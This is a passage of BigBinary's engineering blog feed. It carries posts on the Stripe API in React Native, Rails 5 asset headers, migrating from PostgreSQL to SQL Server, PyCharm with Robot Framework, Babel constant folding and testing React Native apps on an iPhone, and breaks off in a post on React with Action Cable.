href="https://bigbinary.com/videos/learn-ruby-on-rails/how-autoloading-works-in-rails">How autoloading works in Rails</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Stripe API in React Native with fetch]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/using-stripe-api-in-react-native-with-fetch"/>
      <updated>2015-11-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-stripe-api-in-react-native-with-fetch</id>
       <content type="html"><![CDATA[<p><a href="https://stripe.com">Stripe</a> makes it easy to accept payments online. Stripe offers an <a href="https://www.npmjs.com/package/stripe">npm package</a> with <a href="https://stripe.com/docs/api/node">nice documentation</a>.</p><h2>Problem with using Stripe in React Native</h2><p>I added Stripe to my React Native application using the following command.</p><pre><code class="language-plaintext">npm install stripe --save</code></pre><p>Then I added Stripe to the project as shown below.</p><pre><code class="language-plaintext">var stripe = require('stripe')('stripe API key');</code></pre><p>And now I get the following error.</p><p><img src="/blog_images/2015/using-stripe-api-in-react-native-with-fetch/http_error_in_react_native.png" alt="could not mount"></p><p>That's because the npm package uses <a href="https://stripe.com/docs/stripe.js">stripe.js</a>, and stripe.js needs the <a href="https://nodejs.org/api/http.html">http</a> module provided by Node.js.</p><p>Our React Native code does not actually run on Node.js. I know that while building React Native apps we use npm, and we have a node server running in the background, so it feels like we are in Node.js land and can use everything Node.js has to offer. But that's not true. React Native code can't depend on Node.js, because Node.js is not shipped with iOS. It means we can't use any Node.js packages, including <code>http</code>. It means we can't use the <code>stripe</code> npm module.</p><p>Now you can remove the <code>require('stripe')</code> line that was added in the last step.</p><h2>Solution</h2><p>React Native comes with the <a href="https://fetch.spec.whatwg.org">Fetch</a> <a href="https://github.com/github/fetch">API</a>. From the documentation:</p><blockquote><p>The Fetch API provides a JavaScript interface for accessing and manipulating parts of the HTTP pipeline, such as requests and responses.
It also provides a global fetch() method that provides an easy, logical way to fetch resources asynchronously across the network.</p></blockquote><p>stripe.js is a nice wrapper around the Stripe API. The Stripe API is very well documented and is easy to use. Since we can't use stripe.js, we will use the Stripe API directly.</p><p>We will use fetch to <a href="https://stripe.com/docs/api#create_card_token">create a credit card token using the API</a>.</p><pre><code class="language-javascript">return fetch(&quot;https://api.stripe.com/v1/tokens&quot;, {
  method: &quot;post&quot;,
  headers: {
    Accept: &quot;application/json&quot;,
    &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,
    Authorization: &quot;Bearer &quot; + &quot;&lt;YOUR-STRIPE-API-KEY&gt;&quot;,
  },
  body: formBody,
});</code></pre><p>Here, the header has 3 keys. Let's go through them one by one:</p><ul><li><code>'Accept': 'application/json'</code> : tells the endpoint that we expect the response in JSON format.</li><li><code>'Content-Type': 'application/x-www-form-urlencoded'</code> : tells the endpoint that the payload will be one giant query string where name and value pairs are separated by ampersands.</li><li><code>'Authorization': 'Bearer ' + '&lt;YOUR-STRIPE-API-KEY&gt;'</code> : authorizes our actions on Stripe. Here <code>Bearer</code> is just a prefix which we need to attach to the API key because Stripe uses OAuth 2.0. You can read more on Bearer token usage <a href="http://self-issued.info/docs/draft-ietf-oauth-v2-bearer.html">here</a>.</li></ul><p>The payload needs to contain the credit card details.</p><pre><code class="language-javascript">var cardDetails = {
  &quot;card[number]&quot;: &quot;1111 2222 3333 4444&quot;,
  &quot;card[exp_month]&quot;: &quot;01&quot;,
  &quot;card[exp_year]&quot;: &quot;2020&quot;,
  &quot;card[cvc]&quot;: &quot;123&quot;,
};</code></pre><p>Since the <code>Content-Type</code> is <code>application/x-www-form-urlencoded</code>, the payload should be one query string.
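As a quick sanity check, here is what the encoded string ends up looking like for the sample card details. This is a standalone sketch using `Object.keys` and `map`, which produces the same result as the `for...in` loop used later in this post:

```javascript
// Encode the sample card details as application/x-www-form-urlencoded.
var cardDetails = {
  "card[number]": "1111 2222 3333 4444",
  "card[exp_month]": "01",
  "card[exp_year]": "2020",
  "card[cvc]": "123",
};

// Each key and value is percent-encoded, then pairs are joined with "&".
var formBody = Object.keys(cardDetails)
  .map(function (key) {
    return encodeURIComponent(key) + "=" + encodeURIComponent(cardDetails[key]);
  })
  .join("&");

console.log(formBody);
// card%5Bnumber%5D=1111%202222%203333%204444&card%5Bexp_month%5D=01&card%5Bexp_year%5D=2020&card%5Bcvc%5D=123
```

Note how the square brackets in `card[number]` become `%5B` and `%5D`, and the spaces in the card number become `%20`; that is exactly the shape the endpoint expects for this `Content-Type`.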
An example of this would be: <code>city=Miami&amp;state=Florida</code>.</p><p>Let's prepare a proper payload.</p><pre><code class="language-javascript">var formBody = [];
for (var property in cardDetails) {
  var encodedKey = encodeURIComponent(property);
  var encodedValue = encodeURIComponent(cardDetails[property]);
  formBody.push(encodedKey + &quot;=&quot; + encodedValue);
}
formBody = formBody.join(&quot;&amp;&quot;);</code></pre><p>That's it. Now we can attach <code>formBody</code> to the body part of the fetch request and we are good to go.</p><h2>Final solution</h2><p>Here's the whole code snippet.</p><pre><code class="language-javascript">&quot;use strict&quot;;

var stripe_url = &quot;https://api.stripe.com/v1/&quot;;
var secret_key = &quot;&lt;YOUR-STRIPE-API-KEY&gt;&quot;;

module.exports.createCardToken = function (cardNumber, expMonth, expYear, cvc) {
  var cardDetails = {
    &quot;card[number]&quot;: cardNumber,
    &quot;card[exp_month]&quot;: expMonth,
    &quot;card[exp_year]&quot;: expYear,
    &quot;card[cvc]&quot;: cvc,
  };

  var formBody = [];
  for (var property in cardDetails) {
    var encodedKey = encodeURIComponent(property);
    var encodedValue = encodeURIComponent(cardDetails[property]);
    formBody.push(encodedKey + &quot;=&quot; + encodedValue);
  }
  formBody = formBody.join(&quot;&amp;&quot;);

  return fetch(stripe_url + &quot;tokens&quot;, {
    method: &quot;post&quot;,
    headers: {
      Accept: &quot;application/json&quot;,
      &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,
      Authorization: &quot;Bearer &quot; + secret_key,
    },
    body: formBody,
  });
};</code></pre><p>This is an example of registering a credit card with Stripe and getting the token. Similar implementations can be done for other API endpoints.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 allows setting custom HTTP Headers for assets]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-setting-custom-http-headers-for-assets"/>
      <updated>2015-10-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-setting-custom-http-headers-for-assets</id>
      <content type="html"><![CDATA[<p>Let's look at what response headers we get by default when we start with a brand new Rails 4.2.4 application.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/header1.png" alt="header"></p><p>Now let's say that I want to set a custom response header. That's easy. All I need to do is add the following line of code in the controller.</p><pre><code class="language-ruby">response.headers['X-Tracking-ID'] = '123456'</code></pre><p>Now I see this custom response header.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/header2.png" alt="header"></p><h2>Setting custom response header for assets</h2><p>Let's say that I need that custom response header not only for standard web requests but also for my assets. For example, the <code>application.js</code> file is served by Rails on localhost. How would I set a custom header on an asset served by Rails?</p><p>Actually, that's not possible in Rails 4. In Rails 4 we can set only one response header for assets that are served by Rails, and that response header is <code>Cache-Control</code>.</p><p>Here is how I can configure <code>Cache-Control</code> for assets.</p><pre><code class="language-ruby"># open config/environments/production.rb and add the following line
config.static_cache_control = 'public, max-age=1000'</code></pre><p>Now we have modified the <code>Cache-Control</code> header for the assets.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/header3.png" alt="header"></p><p>Besides <code>Cache-Control</code>, no other response header can be set for assets served by Rails. That's a limitation.</p><h2>How Rails apps lived with this limitation so far</h2><p>Rails is not the best server to serve static assets. Apache and NGINX are much better at this job.
Hence, in reality, in production almost everyone puts either Apache or NGINX in front of the Rails server, and in this way Rails does not have to serve static files.</p><p>Having said that, Rails applications hosted at Heroku are an exception. Assets for Rails applications running at Heroku are served by the Rails application itself.</p><h3>Problem we ran into</h3><p>Our <a href="https://bigbinary.com">website</a> is hosted at Heroku. When we ran <a href="https://developers.google.com/speed/pagespeed/insights/">Google PageSpeed Insights</a> for our website, we were warned that we were not using the <code>Expires</code> header for the assets.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/PageSpeedInsightsWarnings.png" alt="PageSpeed Insights Warning"></p><p>Here is how the headers looked for <code>application.js</code>.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/bigbinary_before_expires.png" alt="PageSpeed Insights Warning"></p><p>Now you see the problem we are running into.</p><ul><li>Our application is hosted at Heroku.</li><li>Heroku lets Rails serve the assets.</li><li>Google PageSpeed Insights wants us to set the <code>Expires</code> header on the assets.</li><li>Rails allows only one header for the assets, and that is <code>Cache-Control</code>.</li></ul><p>One easy solution is to host our website at <a href="https://www.digitalocean.com">Digital Ocean</a> and then use Apache or NGINX.</p><h2>Rails 5 saves the day</h2><p>Recently Rails <a href="https://github.com/rails/rails/pull/19135">merged basic support for access control headers</a> and added the ability to define custom HTTP headers on assets served by Rails.</p><p>Behind the scenes, Rails uses the <code>ActionDispatch::Static</code> middleware to take care of serving assets. For example, a request to fetch an image goes through <code>ActionDispatch::Static</code> in the request cycle.
<code>ActionDispatch::Static</code> takes care of serving a <code>Rack::File</code> object from the server with appropriate headers set in the response. The served image can have headers like <code>Content-Type</code> and <code>Cache-Control</code>.</p><h2>Start using Rails master</h2><p>To fix this, we first pointed the app to use Rails master.</p><pre><code class="language-ruby">gem 'rails', github: 'rails/rails'
gem 'rack', github: 'rack/rack' # Rails depends on Rack 2
gem 'arel', github: 'rails/arel' # Rails master works alongside arel master.</code></pre><p>Next, we changed the asset configuration to provide the missing <code>Expires</code> header.</p><pre><code class="language-ruby"># production.rb
config.public_file_server.headers = {
  'Cache-Control' =&gt; 'public, s-maxage=31536000, max-age=15552000',
  'Expires' =&gt; &quot;#{1.year.from_now.to_formatted_s(:rfc822)}&quot;
}</code></pre><p>Here, we are first setting the <code>Cache-Control</code> header to allow public (intermediate) caching, with an <code>s-maxage</code> of a year (31536000 seconds) and a <code>max-age</code> of 180 days (15552000 seconds).
Here <code>s-maxage</code> applies to surrogate (shared) caches, such as the caching that Fastly does internally.</p><p>We then provide the missing <code>Expires</code> value with a future date in the Internet (RFC 822) time format.</p><p>With this setup, we can see that PageSpeed picks up the new headers on the assets and no longer warns us about the missing header.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/PageSpeedInsightsSolved.png" alt="PageSpeed Insights Warning"></p><p>Here is the changed response header for the asset.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/bigbinary_after_expires.png" alt="PageSpeed Insights Warning"></p><h2>Further Reading</h2><p>For more details about the different headers to use for assets, please refer to <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html">RFC 2616</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating Rails app from PostgreSQL to SQL Server]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-from-postgresql-to-sqlserver"/>
      <updated>2015-10-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-from-postgresql-to-sqlserver</id>
      <content type="html"><![CDATA[<p>We started development on a project with <a href="http://www.postgresql.org">PostgreSQL</a> as our database. However, midway we had to switch to <a href="http://www.microsoft.com/en-us/server-cloud/products/sql-server/">SQL Server</a> for a variety of reasons.</p><p>Here are some of the issues we noticed while migrating to SQL Server.</p><h2>Unique constraint on a column which has multiple NULL values</h2><p>As per the ANSI SQL standard, a unique constraint should allow multiple NULL values.</p><p>The PostgreSQL documentation on unique constraints states the following.</p><pre><code class="language-plaintext">In general, a unique constraint is violated when there is more than one row in the table where the values of all of the columns included in the constraint are equal. However, two null values are not considered equal in this comparison. That means even in the presence of a unique constraint it is possible to store duplicate rows that contain a null value in at least one of the constrained columns. This behavior conforms to the SQL standard, but we have heard that other SQL databases might not follow this rule. So be careful when developing applications that are intended to be portable.</code></pre><p>In SQL Server, a unique constraint does <strong>not</strong> allow multiple NULL values.</p><p><a href="https://github.com/plataformatec/devise">Devise</a> by default adds a unique index on the <code>reset_password_token</code> column.</p><pre><code class="language-ruby">add_index :users, :reset_password_token, :unique =&gt; true</code></pre><p><code>Devise</code> is doing the right thing by enforcing a unique index on <code>reset_password_token</code> so that when a user clicks on a link to reset the password, the application knows who the user is.</p><p>However, here is the problem. If we add a new user, then by default the value of <code>reset_password_token</code> is <code>NULL</code>.
If we add another user, then we have two records with a <code>NULL</code> value in <code>reset_password_token</code>. This works in PostgreSQL.</p><p>But SQL Server would not allow us to have two records with <code>NULL</code> in the <code>reset_password_token</code> column.</p><p>So how do we solve this problem?</p><p><a href="https://en.wikipedia.org/wiki/Partial_index">Partial index</a> to the rescue. It is also known as a <code>Filtered index</code>. Both <a href="http://www.postgresql.org/docs/8.0/static/indexes-partial.html">PostgreSQL</a> and <a href="https://msdn.microsoft.com/en-us/library/cc280372.aspx">SQL Server</a> support it. Rails also supports a <code>partial index</code> by allowing us to pass the <code>where</code> option as shown below.</p><pre><code class="language-ruby">add_index :users, :reset_password_token,
                  unique: true,
                  where: 'reset_password_token IS NOT NULL'</code></pre><p>Please <a href="https://github.com/rails-sqlserver/activerecord-sqlserver-adapter/issues/153">visit this issue</a> if you want to see a detailed discussion on this topic.</p><p>This behavior of SQL Server comes into play in various forms. Let's say that we are adding <code>api_auth_token</code> to an existing users table.</p><p>Typically, a migration for that might look as shown below.</p><pre><code class="language-ruby">add_column :users, :api_auth_token, :string,
                                    :null =&gt; true,
                                    :unique =&gt; true</code></pre><p>In this case we have plenty of records in the <code>users</code> table, all of which will get a <code>NULL</code> token, so the above migration will fail in SQL Server.
We will have to resort to using a <code>partial index</code> to fix this issue.</p><h2>Adding a not null constraint on a column with an index</h2><p>In PostgreSQL, the following case will work just fine.</p><pre><code class="language-ruby">add_column :users, :email, :string, :unique =&gt; true
change_column :users, :email, :null =&gt; false</code></pre><p>The above migration will fail with SQL Server.</p><p>In SQL Server, a &quot;not null&quot; constraint <a href="https://msdn.microsoft.com/en-us/library/ms190273.aspx">cannot be added</a> on a column which has an index on it. We need to first remove the unique index, then add the &quot;not null&quot; constraint, and then add the unique index back.</p><p>The other solution is to add the &quot;not null&quot; constraint first in the migration and then add the index.</p><h2>Serialize an array into a string column</h2><p>ActiveRecord <a href="http://edgeguides.rubyonrails.org/active_record_postgresql.html#array">supports the Array datatype</a> for PostgreSQL. We were using this feature to store a list of IDs.</p><p>After switching to SQL Server, we converted the column into a string type and serialized the array.</p><pre><code class="language-ruby">serialize :user_ids, Array</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring PyCharm IDE to run a Robot Framework test]]></title>
       <author><name>Prabhakar Battula</name></author>
      <link href="https://www.bigbinary.com/blog/configuring-pycharm-to-run-tests"/>
      <updated>2015-10-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configuring-pycharm-to-run-tests</id>
      <content type="html"><![CDATA[<p><a href="https://www.jetbrains.com/pycharm">PyCharm</a> is a convenient IDE to work with the <a href="http://robotframework.org">Robot Framework</a>. By default, one can run a test suite or a test script only through the console, which is cumbersome. If the user can run tests from PyCharm itself, that helps improve productivity. This blog explains how to configure PyCharm to run a test suite or a single test from the IDE itself.</p><h2>Configuration to run a single test script</h2><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p1.png" alt="pycharm robot 1"><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p2.png" alt="pycharm robot 2"><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p3.png" alt="pycharm robot 3"></p><p>Running a single test script</p><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p4.png" alt="pycharm robot 4"></p><h2>Configuration to run a particular test suite</h2><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p5.png" alt="pycharm robot 5"></p><p>Running a particular test suite</p><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p6.png" alt="pycharm robot 6"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Optimize JavaScript code using BabelJS]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/code-optimize-javascript-code-using-babeljs"/>
      <updated>2015-08-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/code-optimize-javascript-code-using-babeljs</id>
      <content type="html"><![CDATA[<p>Though <a href="http://babeljs.io/">Babel</a> is a transpiler to convert ESNext code to ES5, it can be used to optimize the code as well.</p><p>Let's say we want to convert the following ES6 code using Babel.</p><pre><code class="language-javascript">let a = 10;
let b = 42;

if (a &lt; b) {
  console.log(&quot;a is less than b&quot;);
} else {
  console.log(&quot;b is less than a&quot;);
}</code></pre><p>It will get translated to:</p><pre><code class="language-javascript">&quot;use strict&quot;;

var a = 10;
var b = 42;

if (a &lt; b) {
  console.log(&quot;a is less than b&quot;);
} else {
  console.log(&quot;b is less than a&quot;);
}</code></pre><p>All good so far. Let's try Babel's constant-folding plugin (link is not available). I am compiling the ES6 code from the command line this time.</p><pre><code class="language-bash">babel --plugins constant-folding index.js --out-file bundle.js -w</code></pre><p>This gives us the following output:</p><pre><code class="language-javascript">&quot;use strict&quot;;

var a = 10;
var b = 42;

if (true) {
  console.log(&quot;a is less than b&quot;);
} else {
  console.log(&quot;b is less than a&quot;);
}</code></pre><p>The <code>if</code> condition changed from <code>(a &lt; b)</code> to <code>(true)</code>. The <code>constant-folding</code> plugin has smartly evaluated the conditional expression <code>a &lt; b</code> and replaced it with the result of that expression.</p><p>This plugin can also optimize other expressions, as shown below.</p><pre><code class="language-javascript">// Unary operators
console.log(!true);

// Binary expression
console.log(20 + 22);

// Function calls
console.log(Math.min(91, 2 + 20));</code></pre><p>Which gets optimized to:</p><pre><code class="language-javascript">// Unary operators
console.log(false);

// Binary expression
console.log(42);

// Function calls
console.log(22);</code></pre><h2>How does this actually work?</h2><p>Though we are using a &quot;constant folding plugin&quot; to achieve this optimization, the real
work happens in Babel itself.</p><p>For every expression in the code, the constant-folding plugin calls the <code>evaluate</code> function from the Babel source code. This function checks whether it can <em>confidently</em> find the end value for a given expression.</p><p>The <code>evaluate</code> function returns a <strong>confidence level</strong> and an <strong>end value</strong> for any given expression. Based on this confidence level, the constant-folding plugin replaces expressions with their end values, altering our original code.</p><h2>How evaluate handles different cases</h2><p>For the code <code>Math.min(10, 20)</code>, evaluate will return</p><p><code>{ confident: true, value: 10 }</code></p><p>For the code <code>a &lt; b</code>, evaluate will return</p><p><code>{ confident: true, value: true }</code>.</p><p>But for a user-defined function like <code>foo('bar')</code> or a browser-defined <code>console.log('hello')</code>, evaluate will return</p><p><code>{ confident: false, value: undefined }</code>.</p><p>The &quot;confident&quot; value will be &quot;false&quot; even if the function returns a constant value. For example, for the code <code>foo(100)</code>, evaluate will return</p><p><code>{ confident: false, value: undefined }</code>.</p><p>Suppose the function <code>foo</code> always returns <code>100</code>. Babel still has a low confidence level. Why? That's because Babel sees that it is a function call and it bails out. It does not even look inside to try to figure things out.</p><p><a href="https://github.com/babel/babel/blob/e2b39084a4a48c48ff3441aab35b22d9efc3c8d6/packages/babel/src/traversal/path/evaluation.js#L43">Here is</a> the evaluate code in Babel. You should check it out.</p><h2>How much optimization is possible?</h2><p>How much help will we get from Babel for optimizing our code? Will it optimize everything?</p><p>The answer is unfortunately no.</p><p>As of now, Babel optimizes logical, binary, and conditional expressions.
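To make the confident/value contract concrete, here is a tiny, hypothetical sketch of an evaluate-style function. It is a heavily simplified stand-in, not Babel's actual implementation (the real `evaluate` works on full AST paths and handles far more node types):

```javascript
// Hypothetical mini-evaluate: returns a confidence flag plus a value,
// mirroring the { confident, value } shape described above.
function miniEvaluate(node) {
  if (node.type === "NumericLiteral") {
    return { confident: true, value: node.value };
  }
  if (node.type === "BinaryExpression" && node.operator === "+") {
    var left = miniEvaluate(node.left);
    var right = miniEvaluate(node.right);
    if (left.confident && right.confident) {
      return { confident: true, value: left.value + right.value };
    }
  }
  // Anything else (e.g. a call to a user-defined function): bail out.
  return { confident: false, value: undefined };
}

// 20 + 22 folds confidently to 42.
var folded = miniEvaluate({
  type: "BinaryExpression",
  operator: "+",
  left: { type: "NumericLiteral", value: 20 },
  right: { type: "NumericLiteral", value: 22 },
});
console.log(folded); // { confident: true, value: 42 }

// A call expression is not folded, no matter what it returns.
var bailed = miniEvaluate({ type: "CallExpression", callee: "foo" });
console.log(bailed.confident); // false
```

A constant-folding pass would then replace the expression node with a literal only when `confident` is `true`, which is exactly why a call like `foo(100)` is left untouched.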
It can also confidently evaluate calls on literals like <code>&quot;babel&quot;.length</code> if the literal is a string or a number.</p><p>For function calls, it supports only certain <a href="https://github.com/babel/babel/blob/master/packages/babel/src/traversal/path/evaluation.js#L3">callees</a> like <code>String</code>, <code>Number</code> and <code>Math</code>. So a call to a user-defined function, even if it returns a fixed value, will not be optimized.</p><h2>Experimental feature</h2><p>This feature looks great, but it's available as an <strong>experimental</strong> feature. If you use the plugin without enabling the <code>experimental</code> flag, you will get the following warning.</p><pre><code class="language-plaintext">$ babel --plugins constant-folding index.js --out-file bundle.js -w
[BABEL] index.js: THE TRANSFORMER constant-folding HAS BEEN MARKED AS EXPERIMENTAL AND IS WIP. USE AT YOUR OWN RISK. THIS WILL HIGHLY LIKELY BREAK YOUR CODE SO USE WITH **EXTREME** CAUTION. ENABLE THE `experimental` OPTION TO IGNORE THIS WARNING.</code></pre><p>In order to get rid of the warning, you need to pass the <code>--experimental</code> flag like this.</p><pre><code class="language-plaintext">$ babel --plugins constant-folding index.js --out-file bundle.js -w --experimental</code></pre><h2>Eliminating dead code</h2><p>In the above code example, we know that the result of <code>if (a &lt; b)</code> is <code>true</code> based on the values of a and b. Since the result is never going to change, there is no need to have the <code>if</code> and <code>else</code> clauses.</p><p>That's <em>dead code</em>.</p><p>Can Babel help us eliminate dead code?</p><p>Yes, with the help of the <code>minification.deadCodeElimination</code> option.</p><pre><code class="language-bash">babel --optional minification.deadCodeElimination index.js --out-file bundle.js -w</code></pre><p>Which converts the earlier code to:</p><pre><code class="language-javascript">&quot;use strict&quot;;

console.log(&quot;a is less than b&quot;);</code></pre><p>I will talk about how Babel can eliminate dead code in a later post.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to test React Native App on a real iPhone]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-test-react-native-app-on-real-iphone"/>
      <updated>2015-08-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-test-react-native-app-on-real-iphone</id>
      <content type="html"><![CDATA[<p>I have been developing a new iOS app using <a href="https://facebook.github.io/react-native/">React Native</a>. I have been testing it using the simulator provided by Xcode. Now it's time to test the app on a real device. One could ask why test on a real device if it works perfectly on a simulator. Here are some of the reasons.</p><ul><li>There are a number of device-specific features which are not testable on a simulator. Phone calls, camera, GPS data, compass and vibration are a few of them.</li><li>Some unexpected cases can only be tested on a real device, like how your application handles incoming calls, low memory situations, low disk space, limited data connectivity, etc.</li><li>Hardware-wise, your device is different from your Mac. If your app is graphics-intensive and requires a lot of CPU usage, it might work seamlessly on your simulator depending on your Mac's specifications, but be laggy and glitchy on the real device.</li></ul><p>Now let's look into how you can start testing your React Native app on a real iPhone.</p><h2>Step 1 - Plug in your device</h2><p>Plug in your device to your Mac and open Xcode.
You will be able to select your device to the right of the Play and Stop buttons.</p><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/select-device.png" alt="select device"></p><p>You might run into one of the following two errors if you have not enrolled into Apple's Developer Program.</p><h2>Error 1 : Failed to code sign</h2><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/xcode-error1.png" alt="xcode error 1"></p><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/xcode-error2.png" alt="xcode error 2"></p><p>To fix the above issues, please enroll in the Apple Developer Program.</p><h2>Error 2 : Disk Image could not be mounted</h2><pre><code class="language-plaintext">The Developer Disk Image could not be mounted:
You may be running a version of iOS that is not supported by this version of Xcode</code></pre><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/could-not-mount.png" alt="could not mount"></p><p>This can happen if your iOS version is not supported by your current version of Xcode. To fix this, just update your Xcode to the latest version from the App Store.</p><h2>Step 2 - Set the right deployment target</h2><p>In your Xcode project setup, the <code>Deployment Target</code> should be set to less than or equal to the iOS version installed on the device.</p><p>If your iPhone is running iOS 7.0 and you have set &quot;Deployment Target&quot; as 8.0, then the app <strong>will not</strong> work. If your iPhone is running iOS 8.0 and you have set &quot;Deployment Target&quot; as 7.0, then the app <strong>will</strong> work.</p><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/deployment-target.png" alt="deployment target"></p><h2>Step 3 - Fix the &quot;Could not connect to development server&quot; error</h2><p>So the app is installed and you can see the launch screen. That's great.
But soon you might get the following error on your iPhone.</p><pre><code class="language-plaintext">Could not connect to development server.
Ensure node server is running and available on the same network
run npm start from react-native root.</code></pre><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/connection-error.PNG" alt="connection error"></p><p>To fix this, open the <code>AppDelegate.m</code> file in your project's iOS folder.</p><p>Locate the line mentioned below and replace <code>localhost</code> with your Mac's IP address, e.g. <code>192.168.x.x</code>.</p><p>To find the IP address of your Mac, this is what React Native suggests we do.</p><blockquote><p>you can get ip by typing <code>ifconfig</code> into the terminal and selecting the <code>inet</code> value under <code>en0:</code>.</p></blockquote><pre><code class="language-objectivec">jsCodeLocation = [NSURL URLWithString:@&quot;http://localhost:8081/index.ios.bundle&quot;];</code></pre><p>Save and click run again. This will fix the error.</p><h2>Step 4 - Fix connecting to an API hosted on the local development server</h2><p>Now the app is installed and you can navigate through the app screens. If the app attempts to make an API call to a server running locally on the machine, then depending on how the local server was started, it could be a problem.</p><p>In my case, I have a Ruby on Rails application running on my local machine. For the app to talk to it, the app should be able to access the Rails server using the private IP of the machine, e.g. <code>192.168.x.x:3000</code>.
It turned out that I had started my Rails server using the command <code>rails server</code>.</p><p>Because of a <a href="http://guides.rubyonrails.org/4_2_release_notes.html#default-host-for-rails-server">change in Rails 4.2</a>, the Rails server listens on <code>localhost</code> and not on <code>0.0.0.0</code>.</p><p>The Rails guide further says the following.</p><blockquote><p>with this change you will no longer be able to access the Rails server from a different machine, for example if your development environment is in a virtual machine and you would like to access it from the host machine. In such cases, please start the server with rails server -b 0.0.0.0 to restore the old behavior.</p></blockquote><p>In this case, the iPhone is trying to talk to the Rails server, so the Rails server must be started using the following command.</p><pre><code class="language-plaintext">rails server -b 0.0.0.0
or
rails server --binding=0.0.0.0</code></pre><p>By doing so, you can now connect to your Rails app from your local network by browsing to <code>http://192.168.x.x:3000</code>.</p><h2>Summary</h2><p>These were some of the issues I came across while testing my iOS app on an actual device, and how I fixed them. Hopefully, this blog post helps you fix these errors and gets you started with testing quickly.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using ReactJS with Rails Action Cable]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/using-reactjs-with-rails-actioncable"/>
      <updated>2015-07-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-reactjs-with-rails-actioncable</id>
      <content type="html"><![CDATA[<p>Recently, DHH announced the availability of an alpha version of Action Cable.</p><p>&lt;blockquote class=&quot;twitter-tweet&quot; data-cards=&quot;hidden&quot; lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;Action Cable v0.1.0 is now available for alpha testers: &lt;a href=&quot;https://t.co/ryqK2ZAKG7&quot;&gt;https://t.co/ryqK2ZAKG7&lt;/a&gt;. I'll be setting up a demo repo shortly as well. ENJOY!&lt;/p&gt; DHH (@dhh) &lt;a href=&quot;https://twitter.com/dhh/status/618886698009759748&quot;&gt;July 8, 2015&lt;/a&gt;&lt;/blockquote&gt;&lt;script async src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;</p><p><a href="https://github.com/rails/actioncable">Action Cable</a> is still under heavy development, but it comes with <a href="https://github.com/rails/actioncable-examples">examples</a> to demonstrate its usage.</p><p>Action Cable integrates websocket-based real-time communication into Ruby on Rails applications. It allows building realtime applications like chats, status updates, etc.</p><h2>Action Cable + React</h2><p>Action Cable provides real-time communication. ReactJS is a good tool to manage view complexity on the client side. Together they make it easy to develop snappy web applications which require state management on the client side, without too much work.</p><p>Anytime the data changes, the new data is instantly provided by Action Cable, and ReactJS shows it on the view without the user doing anything in the application.</p><h2>Integrating React</h2><p>The official Action Cable example is a chat application.
We will be building the same application using <a href="https://facebook.github.io/react">ReactJS</a>.</p><p>First, follow the <a href="https://github.com/rails/actioncable-examples">instructions mentioned</a> to get a working chat application using Action Cable.</p><p>Now that the chat application is working, let's get started with adding ReactJS to the application.</p><p><em>Please note that we have also posted a number of <a href="https://bigbinary.com/videos">videos</a> on learning ReactJS. Check them out if you are interested.</em></p><h2>Step 1 - Add required gems to Gemfile</h2><pre><code class="language-ruby"># react-rails isn't compatible yet with latest Sprockets.
# https://github.com/reactjs/react-rails/pull/322
gem 'react-rails', github: 'vipulnsward/react-rails', branch: 'sprockets-3-compat'

# Add support to use ES6 on top of Babel, instead of using CoffeeScript.
gem 'sprockets-es6'</code></pre><h2>Step 2 - Add required JavaScript files</h2><p>Follow the <a href="https://github.com/reactjs/react-rails#installation">react-rails installation</a> instructions and run <code>rails g react:install</code>.</p><p>This will</p><ul><li>create a components.js file.</li><li>create the <code>app/assets/javascripts/components/</code> directory.</li></ul><p>Now put the following lines in your application.js:</p><pre><code class="language-javascript">//= require react
//= require react_ujs
